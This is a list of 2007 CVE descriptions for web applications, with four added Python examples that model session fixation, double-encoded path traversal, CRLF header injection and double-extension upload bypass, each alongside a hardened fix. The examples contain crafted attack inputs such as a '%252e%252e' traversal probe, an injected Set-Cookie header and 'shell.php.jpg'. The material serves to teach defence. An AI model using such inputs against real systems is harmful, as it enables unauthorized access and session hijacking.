[CVE-2007-1949] Session fixation vulnerability in WebBlizzard CMS allows remote attackers to hijack web sessions by setting a PHPSESSID cookie.
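The session fixation entries above (CVE-2007-2277, CVE-2007-1966, CVE-2007-1953, CVE-2007-1952, CVE-2007-1951 and CVE-2007-1949) all describe the same PHP failure: the application adopts whatever PHPSESSID the client presents and keeps that id across login. The following is an added example, not code from any of those products, that models that behaviour in a toy session store and shows the two controls that break the attack, a strict-id policy (never resume an id the server did not issue; PHP later exposed this as session.use_strict_mode) and regenerating the id on authentication (session_regenerate_id(true)). The credential store and the attacker-chosen id are constructed for the demonstration.

```python
import secrets

# Constructed credential store for the demonstration.
USERS = {"alice": "correct horse battery staple"}


class SessionStore:
    """Toy model of PHP session handling. strict_ids mirrors refusing ids the
    server never issued (session.use_strict_mode=1 in later PHP releases);
    regenerate_on_login mirrors session_regenerate_id(true) after a successful
    authentication. Both default to off, which is the fixation-prone setup."""

    def __init__(self, strict_ids=False, regenerate_on_login=False):
        self.sessions = {}
        self.strict_ids = strict_ids
        self.regenerate_on_login = regenerate_on_login

    def start(self, client_sid):
        """session_start(): resume the id the client presented (cookie or, with
        trans_sid, a PHPSESSID URL parameter) or issue a fresh one."""
        if client_sid in self.sessions:
            return client_sid
        if client_sid is not None and not self.strict_ids:
            self.sessions[client_sid] = {}      # adopts an attacker-chosen id
            return client_sid
        sid = secrets.token_hex(16)
        self.sessions[sid] = {}
        return sid

    def login(self, sid, user, password):
        """Returns (sid_to_set_in_cookie, success)."""
        if USERS.get(user) != password:
            return sid, False
        if self.regenerate_on_login:
            data = self.sessions.pop(sid)       # privilege changed: destroy the old id
            sid = secrets.token_hex(16)
            self.sessions[sid] = data
        self.sessions[sid]["user"] = user
        return sid, True

    def whoami(self, sid):
        return self.sessions.get(sid, {}).get("user")


def fixation_succeeds(store):
    """Attacker plants PHPSESSID=fixed on the victim (crafted link or cookie
    injection), the victim logs in, and the attacker then presents the same id."""
    fixed = "attacker-chosen-id"
    victim_sid = store.start(fixed)
    victim_sid, ok = store.login(victim_sid, "alice", USERS["alice"])
    if not ok:
        raise RuntimeError("constructed login should succeed")
    return store.whoami(fixed) == "alice"


if __name__ == "__main__":
    print("default store:   ", fixation_succeeds(SessionStore()))
    print("strict ids only: ", fixation_succeeds(SessionStore(strict_ids=True)))
    print("regenerate only: ", fixation_succeeds(SessionStore(regenerate_on_login=True)))
    print("both:            ", fixation_succeeds(SessionStore(strict_ids=True, regenerate_on_login=True)))
```

Either control alone defeats the scenario modelled here; regenerating on every privilege change is the one that was available to these 2007-era PHP applications, and it also limits the damage when an id leaks through a URL parameter.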
[CVE-2007-1945] Unspecified vulnerability in the Servlet Engine/Web Container in IBM WebSphere Application Server (WAS) before 6.1.0.7 has unknown impact and attack vectors.
[CVE-2007-1944] The Java Message Service (JMS) in IBM WebSphere Application Server (WAS) before 6.1.0.7 allows attackers to cause a denial of service via unknown vectors involving the "double release [of] a bytebuffer input stream," possibly a double free vulnerability.
[CVE-2007-1941] Cross-site scripting (XSS) vulnerability in the Active Content Filter feature in Domino Web Access (DWA) in IBM Lotus Notes before 6.5.6 and 7.x before 7.0.2 FP1 allows remote attackers to inject arbitrary web script or HTML via a multipart/related e-mail message, a different issue than CVE-2006-4843.
[CVE-2007-1939] Cross-site scripting (XSS) vulnerability in the embedded webserver in Daniel Naber LanguageTool before 0.8.9 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving an error message, possibly the demultiplex method in HTTPServer.java.
[CVE-2007-1938] Ichitaro 2005 through 2007, and possibly related products, allows remote attackers to have an unknown impact via unspecified vectors in a document distributed through e-mail or a web site, possibly due to a buffer overflow or cross-site scripting (XSS).
[CVE-2007-1927] Cross-site scripting (XSS) vulnerability in signup.asp in CmailServer WebMail 5.3.4 and earlier allows remote attackers to inject arbitrary web script or HTML via the POP3Mail parameter.
[CVE-2007-1926] Cross-site scripting (XSS) vulnerability in JBMC Software DirectAdmin before 1.293 does not properly display log files, which allows remote authenticated users to inject arbitrary web script or HTML via (1) http or (2) ftp requests logged in /var/log/directadmin/security.log
[CVE-2007-1919] Cross-site scripting (XSS) vulnerability in index.php in Arizona Dream Livre d'or (livor) 2.5 allows remote attackers to inject arbitrary web script or HTML via the page parameter.
[CVE-2007-1905] Cross-site scripting (XSS) vulnerability in auth.php in Pineapple Technologies QuizShock 1.6.1 and earlier allows remote attackers to inject arbitrary web script or HTML via encoded special characters in the forward_to parameter, as demonstrated using "<
[CVE-2007-1903] Cross-site scripting (XSS) vulnerability in search.php in SonicBB 1.0 allows remote attackers to inject arbitrary web script or HTML via the part parameter.
[CVE-2007-1899] Multiple SQL injection vulnerabilities in myWebland myBloggie 2.1.6 allow remote attackers to execute arbitrary SQL commands via (1) the user_id parameter in a viewuser action to index.php, and allow remote authenticated administrators to execute arbitrary SQL commands via (2) the post_id parameter in an edit action to admin.php.
[CVE-2007-1894] Cross-site scripting (XSS) vulnerability in wp-includes/general-template.php in WordPress before 20070309 allows remote attackers to inject arbitrary web script or HTML via the year parameter in the wp_title function.
[CVE-2007-1882] qcbin/servlet/tdservlet/TDAPI_GeneralWebTreatment in HP Mercury Quality Center 9.0 build 9.1.0.4352 allows remote authenticated users to execute arbitrary SQL commands via the RunQuery method.
[CVE-2007-1873] Cross-site scripting (XSS) vulnerability in Mephisto 0.7.3 allows remote attackers to inject arbitrary web script or HTML via the q parameter to the search script.
[CVE-2007-1872] Cross-site scripting (XSS) vulnerability in toendaCMS 1.5.3 allows remote attackers to inject arbitrary web script or HTML via the searchword parameter in a search id.
[CVE-2007-1871] Cross-site scripting (XSS) vulnerability in chcounter 3.1.3 allows remote attackers to inject arbitrary web script or HTML via the login_name parameter to /stats/.
[CVE-2007-1860] mod_jk in Apache Tomcat JK Web Server Connector 1.2.x before 1.2.23 decodes request URLs within the Apache HTTP Server before passing the URL to Tomcat, which allows remote attackers to access protected pages via a crafted prefix JkMount, possibly involving double-encoded .. (dot dot) sequences and directory traversal, a related issue to CVE-2007-0450.
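The mod_jk entry above is an instance of a general front-end/back-end decoding mismatch: the web server decodes the URL once, makes its access decision on that form, and forwards the decoded form to the container, which decodes it again. A %252e%252e segment survives the first decode as %2e%2e, passes the prefix check, and only turns into ".." inside Tomcat. The following is an added example (not mod_jk's code; the /app/ and /admin/ prefixes are a constructed policy) that reproduces the mismatch in a few lines and shows a front end that fails closed on still-ambiguous paths and forwards the raw URI so it is decoded exactly once.

```python
from urllib.parse import unquote

# Constructed policy, not mod_jk's real configuration: the front end forwards
# /app/* to the servlet container and denies /admin/* itself.
FORWARDED_PREFIX = "/app/"
DENIED_PREFIX = "/admin/"


def canonicalise(path):
    """Resolve '.' and '..' segments the way a container does after decoding."""
    out = []
    for seg in path.split("/"):
        if seg == "..":
            if out:
                out.pop()
        elif seg not in ("", "."):
            out.append(seg)
    return "/" + "/".join(out)


def container_resolve(forwarded_uri):
    """Back end: URL-decodes whatever it is handed, then canonicalises."""
    return canonicalise(unquote(forwarded_uri))


def front_end_vulnerable(raw_uri):
    """Decode once, authorise on that form, forward the decoded form.
    The container then decodes a second time and sees a different path."""
    once = unquote(raw_uri)
    if once.startswith(DENIED_PREFIX):
        return ("denied", None)
    if once.startswith(FORWARDED_PREFIX):
        return ("forwarded", container_resolve(once))
    return ("not-mounted", None)


def front_end_hardened(raw_uri):
    """Fail closed on anything still ambiguous after one decode ('%' or dot
    segments), so the container cannot resolve a path the front end never
    authorised, and forward the raw URI so it is decoded only once."""
    once = unquote(raw_uri)
    if "%" in once or any(seg in (".", "..") for seg in once.split("/")):
        return ("rejected", None)
    if once.startswith(DENIED_PREFIX):
        return ("denied", None)
    if once.startswith(FORWARDED_PREFIX):
        return ("forwarded", container_resolve(raw_uri))
    return ("not-mounted", None)


if __name__ == "__main__":
    probe = "/app/%252e%252e/admin/users"
    print("vulnerable:", front_end_vulnerable(probe))   # reaches /admin/users
    print("hardened:  ", front_end_hardened(probe))     # rejected
```

The same check applies to any reverse proxy or WAF in front of an application server: authorise on the canonical form, and make sure only one hop performs percent-decoding.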
[CVE-2007-1848] Cross-site scripting (XSS) vulnerability in admin/classes/ui.dta.php in Drake CMS allows remote attackers to inject arbitrary web script or HTML via the desc[][title] field. NOTE: Drake CMS has only a beta version available, and the vendor has previously stated "We do not consider security reports valid until the first official release of Drake CMS."
[CVE-2007-1836] The command line administration interface in Data Domain OS before 4.0.3.6 allows remote authenticated users to execute arbitrary commands via shell metacharacters in certain arguments to various commands, as demonstrated by the interface argument to the (1) ifconfig and (2) ping commands.
[CVE-2007-1832] web-app.org WebAPP before 0.9.9.6 allows remote authenticated users to upload certain files (1) via a crafted filename or (2) by "using percent encoding in forms."
[CVE-2007-1831] web-app.org WebAPP before 0.9.9.6 allows remote authenticated users to open files and write "wrong data" via a crafted QUERY_STRING.
[CVE-2007-1830] Unspecified vulnerability in the Username Hijacking Patch 20070312 for web-app.org WebAPP 0.9.9.6 allows remote attackers to obtain administrative access via unknown vectors, related to "something overlooked in the original that was still overlooked in the patch", and possibly related to copying files to the user-lib and the "XSS and cookies exploit."
[CVE-2007-1829] Multiple unspecified vulnerabilities in web-app.net WebAPP have unknown impact and attack vectors, described as "[having] other [security] issues too, not as bad as letting users take over your admin account, but bad too."
[CVE-2007-1828] Multiple cross-site scripting (XSS) vulnerabilities in web-app.org WebAPP before 0.9.9.6 allow remote authenticated users to inject arbitrary web script or HTML via (1) the QUERY_STRING corresponding to drop downs or (2) various forms.
[CVE-2007-1827] Multiple unspecified vulnerabilities in form input validation in web-app.org WebAPP before 0.9.9.6 allow remote authenticated users to corrupt data files, gain access to private files, and execute arbitrary code via "certain characters."
[CVE-2007-1809] Multiple PHP remote file inclusion vulnerabilities in GraFX Company WebSite Builder (CWB) PRO 1.5 allow remote attackers to execute arbitrary PHP code via a URL in the INCLUDE_PATH parameter to (1) cls_headline_prod.php, (2) cls_listorders.php, or (3) cls_viewpastorders.php in include/, different vectors than CVE-2007-1513.
[CVE-2007-1802] Cross-site scripting (XSS) vulnerability in MailDwarf 3.01 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2007-1786] SQL injection vulnerability in Hitachi Collaboration - Online Community Management 01-00 through 01-30, as used in Groupmax Collaboration Portal, Groupmax Collaboration Web Client, uCosminexus Collaboration Portal, Cosminexus Collaboration Portal, and uCosminexus Content Manager, allows remote attackers to execute arbitrary SQL commands via unspecified vectors.
[CVE-2007-1780] Cross-site scripting (XSS) vulnerability in the DHT shell (owdhtshell) in Overlay Weaver 0.5.9 to 0.5.11, when invoked with the -x option, allows remote attackers to inject arbitrary web script or HTML via fields in certain input forms.
[CVE-2007-1779] Multiple SQL injection vulnerabilities in the MySQL back-end in Advanced Website Creator (AWC) before 1.9.0 might allow remote attackers to execute arbitrary SQL commands via unspecified parameters, related to use of mysql_escape_string instead of mysql_real_escape_string.
[CVE-2007-1774] Multiple cross-site scripting (XSS) vulnerabilities in aBitWhizzy allow remote attackers to inject arbitrary web script or HTML via the d parameter to (1) whizzery/whizzypic.php or (2) whizzery/whizzylink.php.
[CVE-2007-1771] PHP remote file inclusion vulnerability in manage/javascript/formjavascript.php in Ay System Solutions Web Content System (WCS) 2.7.1 allows remote attackers to execute arbitrary PHP code via a URL in the path[JavascriptEdit] parameter.
[CVE-2007-1768] Cross-site scripting (XSS) vulnerability in app/helpers/application_helper.rb in Mephisto 0.7.3 and Mephisto Edge 20070325 allows remote attackers to inject arbitrary web script or HTML via the author name field in a comment.
[CVE-2007-1748] Stack-based buffer overflow in the RPC interface in the Domain Name System (DNS) Server Service in Microsoft Windows 2000 Server SP 4, Server 2003 SP 1, and Server 2003 SP 2 allows remote attackers to execute arbitrary code via a long zone name containing character constants represented by escape sequences.
[CVE-2007-1744] Directory traversal vulnerability in the Shared Folders feature for VMware Workstation before 5.5.4, when a folder is shared, allows users on the guest system to write to arbitrary files on the host system via the "Backdoor I/O Port" interface.
[CVE-2007-1732] ** DISPUTED ** Cross-site scripting (XSS) vulnerability in an mt import in wp-admin/admin.php in WordPress 2.1.2 allows remote authenticated administrators to inject arbitrary web script or HTML via the demo parameter. NOTE: the provenance of this information is unknown
[CVE-2007-1723] Multiple cross-site scripting (XSS) vulnerabilities in the administration console in Secure Computing CipherTrust IronMail 6.1.1 allow remote attackers to inject arbitrary web script or HTML via the (1) network, (2) defRouterIp, (3) hostName, (4) domainName, (5) ipAddress, (6) defaultRouter, (7) dns1, or (8) dns2 parameter to (a) admin/system_IronMail.do
[CVE-2007-1714] Cross-site scripting (XSS) vulnerability in index.php in CcCounter 2.0 allows remote attackers to inject arbitrary web script or HTML via the dir parameter.
[CVE-2007-1712] SQL injection vulnerability in default.asp in ActiveWebSoftwares Active Auction Pro 7.1 allows remote attackers to execute arbitrary SQL commands via the catid parameter.
[CVE-2007-1706] SQL injection vulnerability in eWebQuiz.asp in eWebQuiz 8 allows remote attackers to execute arbitrary SQL commands via the QuizID parameter.
[CVE-2007-1692] The default configuration of Microsoft Windows uses the Web Proxy Autodiscovery Protocol (WPAD) without static WPAD entries, which might allow remote attackers to intercept web traffic by registering a proxy server using WINS or DNS, then responding to WPAD requests, as demonstrated using Internet Explorer. NOTE: it could be argued that if an attacker already has control over WINS/DNS, then web traffic could already be intercepted by modifying WINS or DNS records, so this would not cross privilege boundaries and would not be a vulnerability. It has also been reported that DHCP is an alternate attack vector.
[CVE-2007-1685] Buffer overflow in k9filter.exe in BlueCoat K9 Web Protection 3.2.36, and probably other versions before 3.2.44, allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long HTTP GET request to port 2372.
[CVE-2007-1683] Stack-based buffer overflow in the DoWebMenuAction function in the IncrediMail IMMenuShellExt ActiveX control (ImShExt.dll) allows remote attackers to execute arbitrary code via unspecified vectors.
[CVE-2007-1681] Format string vulnerability in libwebconsole_services.so in Sun Java Web Console 2.2.2 through 2.2.5 allows remote attackers to cause a denial of service (application crash), obtain sensitive information, and possibly execute arbitrary code via unspecified vectors during a failed login attempt, related to syslog.
[CVE-2007-1679] ** DISPUTED ** Multiple cross-site scripting (XSS) vulnerabilities in Horde Groupware Webmail 1.0 allow remote authenticated users to inject arbitrary web script or HTML via unspecified vectors in (1) imp/search.php and (2) ingo/rule.php. NOTE: this issue has been disputed by the vendor, noting that the search.php issue was resolved in CVE-2006-4255, and attackers can only use rule.php to inject XSS into their own pages.
[CVE-2007-1678] Cross-site scripting (XSS) vulnerability in the Fizzle 0.5 extension for Firefox allows remote attackers to inject arbitrary web script or HTML via RSS feeds, which are executed by the chrome: URI handler.
[CVE-2007-1652] OpenID allows remote attackers to forcibly log a user into an OpenID enabled site, divulge the user's personal information to this site, and add the site to the trusted sites list via a crafted web page, related to cached tokens.
[CVE-2007-1651] Cross-site request forgery (CSRF) vulnerability in OpenID allows remote attackers to restore the login session of a user on an OpenID enabled site via unspecified vectors related to an arbitrary remote web site and cached tokens, after the user has signed into an OpenID server, logged into the OpenID enabled site, and then logged out of the OpenID enabled site.
[CVE-2007-1647] Moodle 1.5.2 and earlier stores sensitive information under the web root with insufficient access control, and provides directory listings, which allows remote attackers to obtain user names, password hashes, and other sensitive information via a direct request for session (sess_*) files in moodledata/sessions/.
[CVE-2007-1646] Multiple cross-site scripting (XSS) vulnerabilities in SubHub 2.3.0 allow remote attackers to inject arbitrary web script or HTML via (1) the searchtext parameter to (a) /search, or the (2) message parameter to (b) /calendar or (c) /subscribe.
[CVE-2007-1644] The dynamic DNS update mechanism in the DNS Server service on Microsoft Windows does not properly authenticate clients in certain deployments or configurations, which allows remote attackers to change DNS records for a web proxy server and conduct man-in-the-middle (MITM) attacks on web traffic, conduct pharming attacks by poisoning DNS records, and cause a denial of service (erroneous name resolution).
[CVE-2007-1640] Multiple PHP remote file inclusion vulnerabilities in ClassWeb 2.03 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the BASE parameter to (1) language.php and (2) phpadmin/survey.php.
[CVE-2007-1637] Multiple buffer overflows in the IMAILAPILib ActiveX control (IMailAPI.dll) in Ipswitch IMail Server before 2006.2 allow remote attackers to execute arbitrary code via the (1) WebConnect and (2) Connect members in the (a) IMailServer control
[CVE-2007-1632] Unspecified vulnerability in TYPOlight webCMS before 2.2 Build 5 has unknown impact and attack vectors related to a "major security hole."
[CVE-2007-1630] SQL injection vulnerability in default.asp in ActiveWebSoftwares Active Link Engine allows remote attackers to execute arbitrary SQL commands via the catid parameter.
[CVE-2007-1629] SQL injection vulnerability in default.asp in ActiveWebSoftwares Active Photo Gallery allows remote attackers to execute arbitrary SQL commands via the catid parameter.
[CVE-2007-1625] Cross-site scripting (XSS) vulnerability in save_entry.php in realGuestbook 5.01 allows remote attackers to inject arbitrary web script or HTML via the homepage parameter, as reachable through add_entry.php. NOTE: the original report stated that the vulnerability was in add_entry.php, which does not receive the input data.
[CVE-2007-1623] Multiple cross-site scripting (XSS) vulnerabilities in realGuestbook 5.01, when register_globals is enabled, allow remote attackers to inject arbitrary web script or HTML via the (1) bg_color_1, (2) fs_menu, (3) fc_menu, (4) ff_menu, (5) bg_color_2, (6) fs_normal, (7) fc_normal, and (8) ff_normal parameters to welcome_admin.php
[CVE-2007-1611] Cross-site scripting (XSS) vulnerability in the RSS reader in a certain SOURCENEXT product, probably IKANARI JIJYOU 1.0.0 and 1.0.1, allows remote attackers to inject arbitrary web script or HTML via the title of an article in a feed.
[CVE-2007-1610] Cross-site scripting (XSS) vulnerability in the RSS reader in Glue Software NewsGlue before 1.3.4 allows remote attackers to inject arbitrary web script or HTML via a feed.
[CVE-2007-1609] Cross-site scripting (XSS) vulnerability in servlet/Spy in Dynamic Monitoring Services (DMS) in Oracle Application Server (OAS) 10g 10.1.2.0.0 allows remote attackers to inject arbitrary web script or HTML via the table parameter. NOTE: This may be related to CVE-2002-0563.
[CVE-2007-1608] CRLF injection vulnerability in IBM WebSphere Application Server (WAS) before 6.0.2.19 allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via a single CRLF sequence in a context that is not a valid multi-line header.
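The WebSphere entry above turns on a detail of HTTP header syntax: a CR LF followed by a space or tab is (obsolete) line folding and stays inside the header, while a CR LF followed by anything else starts a new header. A server that lets a single CR LF through because it might be a fold hands the attacker a new header line. The following is an added example, not WebSphere's code, with a constructed redirect target carrying an injected Set-Cookie line; it shows what a client parser makes of the unchecked value and the hardened rule, which is simply to refuse CR or LF in any header value rather than reason about folding.

```python
def render_header_vulnerable(name, value):
    """Concatenate without checking the value: a CR LF inside it starts a new header line."""
    return f"{name}: {value}\r\n"


def render_header_hardened(name, value):
    """Refuse any CR or LF in a header value instead of deciding whether the
    sequence is a legal continuation; servers should never emit folded headers."""
    if "\r" in value or "\n" in value:
        raise ValueError("CR/LF in header value")
    return f"{name}: {value}\r\n"


def hardened_rejects(name, value):
    try:
        render_header_hardened(name, value)
    except ValueError:
        return True
    return False


def parse_header_block(raw):
    """Client-side view: split on CR LF, treat a line starting with SP/HT as a
    continuation of the previous header (obs-fold), anything else as a new header."""
    headers = []
    for line in raw.split("\r\n"):
        if not line:
            continue
        if line[0] in " \t" and headers:
            headers[-1] = (headers[-1][0], headers[-1][1] + " " + line.strip())
            continue
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return headers


def header_names_seen(name, value):
    """Names a client would see after the vulnerable renderer emits one header."""
    return [h[0] for h in parse_header_block(render_header_vulnerable(name, value))]


# Constructed redirect target carrying an injected Set-Cookie line.
PROBE = "/home\r\nSet-Cookie: PHPSESSID=attacker-chosen"

if __name__ == "__main__":
    print(header_names_seen("Location", PROBE))        # two headers, not one
    print(hardened_rejects("Location", PROBE))         # True
```

A bare LF without CR is worth refusing as well: many clients split headers on LF alone, so a filter that only looks for the full CR LF pair is still bypassable.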
[CVE-2007-1607] search.php in w-Agora (Web-Agora) allows remote attackers to obtain potentially sensitive information via a ' (quote) value followed by certain SQL sequences in the (1) search_forum or (2) search_user parameter, which force a SQL error.
[CVE-2007-1606] Multiple cross-site scripting (XSS) vulnerabilities in w-Agora (Web-Agora) allow remote attackers to inject arbitrary web script or HTML via (1) the showuser parameter to profile.php, the (2) search_forum or (3) search_user parameter to search.php, or (4) the userid parameter to change_password.php.
[CVE-2007-1605] w-Agora (Web-Agora) allows remote attackers to obtain sensitive information via a request to rss.php with an invalid (1) site or (2) bn parameter, (3) a certain value of the site[] parameter, or (4) an empty value of the bn[] parameter
[CVE-2007-1604] Multiple unrestricted file upload vulnerabilities in w-Agora (Web-Agora) allow remote attackers to upload and execute arbitrary PHP code (1) via a forum message with an attached file, which is stored under forums/hello/hello/notes/ or (2) by using browse_avatar.php to upload a file with a double extension, as demonstrated by .php.jpg.
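Vector (2) of the w-Agora entry above relies on a check that looks only at the last extension while Apache's mod_mime, under an AddHandler for .php, examines every extension in the name, so shell.php.jpg passes the check and is still executed. The following is an added example, not w-Agora's code, that models both the naive check and the server-side rule, and shows a stricter acceptance step: strip any path, allow exactly one allowlisted extension, and store the file under a server-generated name. The extension and handler-token lists are constructed for the example and should be tuned to the server's actual AddHandler lines.

```python
import secrets

# Constructed lists for the example: image extensions the application accepts and the
# tokens the web server maps to a script handler.
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}
SCRIPT_TOKENS = {"php", "php3", "php4", "php5", "phtml", "phar"}


def naive_accepts(filename):
    """The browse_avatar.php-style check: only the trailing extension is examined."""
    return filename.lower().endswith(tuple("." + e for e in ALLOWED_EXT))


def apache_addhandler_executes(filename):
    """Model of mod_mime's multiple-extension rule: with AddHandler for .php, every
    extension in the name is examined, so shell.php.jpg reaches the PHP handler."""
    exts = filename.lower().split(".")[1:]
    return any(e in SCRIPT_TOKENS for e in exts)


def stored_name(filename, token=None):
    """Hardened acceptance: strip any path component, require exactly one extension
    from the allowlist, and store under a server-generated name so the client never
    controls the name on disk. Returns the stored name, or None to reject."""
    base = filename.replace("\\", "/").rsplit("/", 1)[-1].lower()
    parts = base.split(".")
    if len(parts) != 2 or not parts[0] or parts[1] not in ALLOWED_EXT:
        return None
    return (token or secrets.token_hex(8)) + "." + parts[1]


if __name__ == "__main__":
    for name in ("cat.jpg", "shell.php.jpg", "../../cat.png"):
        print(name, naive_accepts(name), apache_addhandler_executes(name), stored_name(name))
```

Renaming closes the double-extension trick but not vector (1), the attachment stored under the web root; that needs the upload directory outside the DocumentRoot, or served with script handlers removed (RemoveHandler / php_flag engine off in that directory).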
[CVE-2007-1599] wp-login.php in WordPress allows remote attackers to redirect authenticated users to other websites and potentially obtain sensitive information via the redirect_to parameter.
[CVE-2007-1597] Unclassified NewsBoard 1.6.3 stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain (1) the board log via a direct request for logs/board-YYYY-MM-DD.log, (2) the mail and private message (PM) log via a direct request for logs/email-YY-MM-DD-HH-MM-SS.log, (3) the SQL error message log via a direct request for logs/error-YY-MM.log, and (4) the IP log via a direct request for logs/ip.log.
[CVE-2007-1576] Multiple cross-site scripting (XSS) vulnerabilities in PHProjekt 5.2.0, when magic_quotes_gpc is disabled, allow remote authenticated users to inject arbitrary web script or HTML via unspecified vectors to the (1) Projects, (2) Contacts, (3) Helpdesk, (4) Search (only Gecko engine driven Browsers), and (5) Notes modules.
[CVE-2007-1551] Multiple cross-site scripting (XSS) vulnerabilities in phpx 3.5.15 allow remote attackers to inject arbitrary web script or HTML via (1) the signature in "dans profile," or (2) search.php.
[CVE-2007-1548] SQL injection vulnerability in functions/functions_filters.asp in Web Wiz Forums before 8.05a (MySQL version) does not properly filter certain characters in SQL commands, which allows remote attackers to execute arbitrary SQL commands via \"' (backslash double-quote quote) sequences, which are collapsed into \'', as demonstrated via the name parameter to forum/pop_up_member_search.asp.
[CVE-2007-1526] Sun Java System Web Server 6.1 before 20070314 allows remote authenticated users with revoked client certificates to bypass the Certificate Revocation List (CRL) authorization control and access secure web server instances running under an account different from that used for the admin server via unspecified vectors.
[CVE-2007-1519] Cross-site scripting (XSS) vulnerability in modules.php in PHP-Nuke 8.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the query parameter in a search operation in the Downloads module, a different product than CVE-2006-3948.
[CVE-2007-1515] Multiple cross-site scripting (XSS) vulnerabilities in Horde IMP H3 4.1.3, and possibly earlier, allow remote attackers to inject arbitrary web script or HTML via (1) the email Subject header in thread.php, (2) the edit_query parameter in search.php, or other unspecified parameters in search.php. NOTE: some of these details are obtained from third party information.
[CVE-2007-1514] PHP remote file inclusion vulnerability in index.php in ViperWeb Portal alpha 0.1 allows remote attackers to execute arbitrary PHP code via a URL in the modpath parameter.
[CVE-2007-1513] PHP remote file inclusion vulnerability in comanda.php in GraFX Company WebSite Builder (CWB) PRO 1.9.8, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the INCLUDE_PATH parameter.
[CVE-2007-1508] Cross-site scripting (XSS) vulnerability in CMD_USER_STATS in DirectAdmin allows remote attackers to inject arbitrary web script or HTML via the RESULT parameter, a different vector than CVE-2006-5983.
[CVE-2007-1506] Cross-site scripting (XSS) vulnerability in PORTAL.wwv_main.render_warning_screen in the Oracle Portal 10g allows remote attackers to inject arbitrary web script or HTML via the (1) p_oldurl and (2) p_newurl parameters.
[CVE-2007-1504] Cross-site scripting (XSS) vulnerability in the Servlet Service in Fujitsu Interstage Application Server (IJServer) 8.0.2 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, possibly involving web.xml and HTTP 404 and 500 status codes.
[CVE-2007-1494] Cross-site scripting (XSS) vulnerability in NukeSentinel before 2.5.06 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to the "filters for https:// and http://".
[CVE-2007-1491] Apache Tomcat in Avaya S87XX, S8500, and S8300 before CM 3.1.3, and Avaya SES allows connections from external interfaces via port 8009, which exposes it to attacks from outside parties.
[CVE-2007-1490] Unspecified maintenance web pages in Avaya S87XX, S8500, and S8300 before CM 3.1.3, and Avaya SES allow remote authenticated users to execute arbitrary commands via shell metacharacters in unspecified vectors (aka "shell command injection").
[CVE-2007-1489] Unspecified vulnerability in web-app.org Web Automated Perl Portal (WebAPP) 0.9.9.4 to 0.9.9.6 allows remote attackers to obtain admin access by modifying cookies and performing "certain consecutive actions," possibly due to a cross-site request forgery (CSRF) vulnerability.
[CVE-2007-1488] Unspecified vulnerability in Sun Java System Web Server 6.0 and 6.1 before 20070315 allows remote attackers to "gain unauthorized access to data", possibly involving a sample application.
[CVE-2007-1487] Directory traversal vulnerability in index.php in Sascha Schroeder (aka CyberTeddy or Cyber-inside) WebLog allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter in a showarticles action.
[CVE-2007-1483] Multiple PHP remote file inclusion vulnerabilities in WebCalendar 0.9.45 allow remote attackers to execute arbitrary PHP code via a URL in the includedir parameter to (1) login.php, (2) get_reminders.php, or (3) get_events.php.
[CVE-2007-1482] Cross-site scripting (XSS) vulnerability in index.php in WBBlog allows remote attackers to inject arbitrary web script or HTML via the e_id parameter in a viewentry cmd.
[CVE-2007-1479] Cross-site scripting (XSS) vulnerability in Guestbook.php in Creative Guestbook 1.0 allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter.
[CVE-2007-1473] Cross-site scripting (XSS) vulnerability in framework/NLS/NLS.php in Horde Framework before 3.1.4 RC1, when the login page contains a language selection box, allows remote attackers to inject arbitrary web script or HTML via the new_lang parameter to login.php.
[CVE-2007-1468] Cross-site scripting (XSS) vulnerability in IBM Rational ClearQuest (CQ) Web 7.0.0.0 allows remote attackers to inject arbitrary web script or HTML via an attachment to a defect log entry.
[CVE-2007-1467] Multiple cross-site scripting (XSS) vulnerabilities in (1) PreSearch.html and (2) PreSearch.class in Cisco Secure Access Control Server (ACS), VPN Client, Unified Personal Communicator, MeetingPlace, Unified MeetingPlace, Unified MeetingPlace Express, CallManager, IP Communicator, Unified Video Advantage, Unified Videoconferencing 35xx products, Unified Videoconferencing Manager, WAN Manager, Security Device Manager, Network Analysis Module (NAM), CiscoWorks and related products, Wireless LAN Solution Engine (WLSE), 2006 Wireless LAN Controllers (WLC), and Wireless Control System (WCS) allow remote attackers to inject arbitrary web script or HTML via the text field of the search form.
[CVE-2007-1462] The luci server component in conga preserves the password between page loads for the Add System/Cluster task flow by storing the password in the Value attribute of a password entry field, which allows attackers to steal the password by performing a "view source" or other operation to obtain the web page. NOTE: there are limited circumstances under which such an attack is feasible.
[CVE-2007-1459] Multiple PHP remote file inclusion vulnerabilities in WebCreator 0.2.6-rc3 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the moddir parameter to (1) content/load.inc.php, (2) config/load.inc.php, (3) http/load.inc.php, and unspecified other files.
[CVE-2007-1452] The FDF support (ext/fdf) in PHP 5.2.0 and earlier does not implement the input filtering hooks for ext/filter, which allows remote attackers to bypass web site filters via an application/vnd.fdf formatted POST.
[CVE-2007-1448] The Tape Engine in CA (formerly Computer Associates) BrightStor ARCserve Backup 11.5 and earlier allows remote attackers to cause a denial of service (disabled interface) by calling an unspecified RPC function.
